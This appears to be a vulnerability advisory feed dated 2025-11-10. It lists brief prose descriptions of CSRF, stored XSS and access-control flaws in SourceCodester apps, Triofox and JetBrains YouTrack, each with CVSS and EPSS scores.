Security Vulnerabilities
Cross-Site Request Forgery (CSRF) in SourceCodester Product Expiry Management System. The User Management module (delete-user.php) allows remote attackers to delete arbitrary user accounts via forged cross-origin GET requests because the endpoint relies solely on session cookies and lacks CSRF protection.
CVSS Score
8.8
EPSS Score
0.0
Published
2025-11-10
A Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Simple To-Do List System 1.0 in the "Add Tasks" text input. An authenticated user can submit HTML/JavaScript that is not correctly sanitized or encoded on output. The injected script is stored and later rendered in the browser of any user who views the task, allowing execution of arbitrary script in the context of the victim's browser.
CVSS Score
5.4
EPSS Score
0.0
Published
2025-11-10
The send_message.php endpoint in SourceCodester Simple Public Chat Room 1.0 is vulnerable to Cross-Site Request Forgery (CSRF). The application does not implement any CSRF-protection mechanisms such as tokens, nonces, or same-site cookie restrictions. An attacker can create a malicious HTML page that, when visited by an authenticated user, will automatically submit a forged POST request to the vulnerable endpoint. This request will be executed with the victim's privileges, allowing the attacker to perform unauthorized actions on their behalf, such as sending arbitrary messages in any chat room.
CVSS Score
6.5
EPSS Score
0.0
Published
2025-11-10
CVE-2025-12480
Triofox versions prior to 16.7.10368.56560, are vulnerable to an Improper Access Control flaw that allows access to initial setup pages even after setup is complete.
Known exploited
CVSS Score
9.1
EPSS Score
0.627
Published
2025-11-10
In JetBrains YouTrack before 2025.3.104432 missing TLS certificate validation enabled data disclosure
CVSS Score
8.1
EPSS Score
0.0
Published
2025-11-10
In JetBrains YouTrack before 2025.3.104432 missing user principal cleanup led to reuse of incorrect authorization context
CVSS Score
3.1
EPSS Score
0.0
Published
2025-11-10
In JetBrains YouTrack before 2025.3.104432 improper access control allowed modify MCP tool logic
CVSS Score
5.4
EPSS Score
0.0
Published
2025-11-10
In JetBrains YouTrack before 2025.3.104432 missing VCS URL validation allowed delegation to unauthorized repositories from the Junie widget
CVSS Score
7.4
EPSS Score
0.0
Published
2025-11-10
In JetBrains YouTrack before 2025.3.104432 misconfiguration in the Junie could lead to exposure of the global Junie token
CVSS Score
9.6
EPSS Score
0.0
Published
2025-11-10
In JetBrains YouTrack before 2025.3.104432 insecure Junie configuration could lead to data exposure and unauthorized changes
CVSS Score
5.4
EPSS Score
0.0
Published
2025-11-10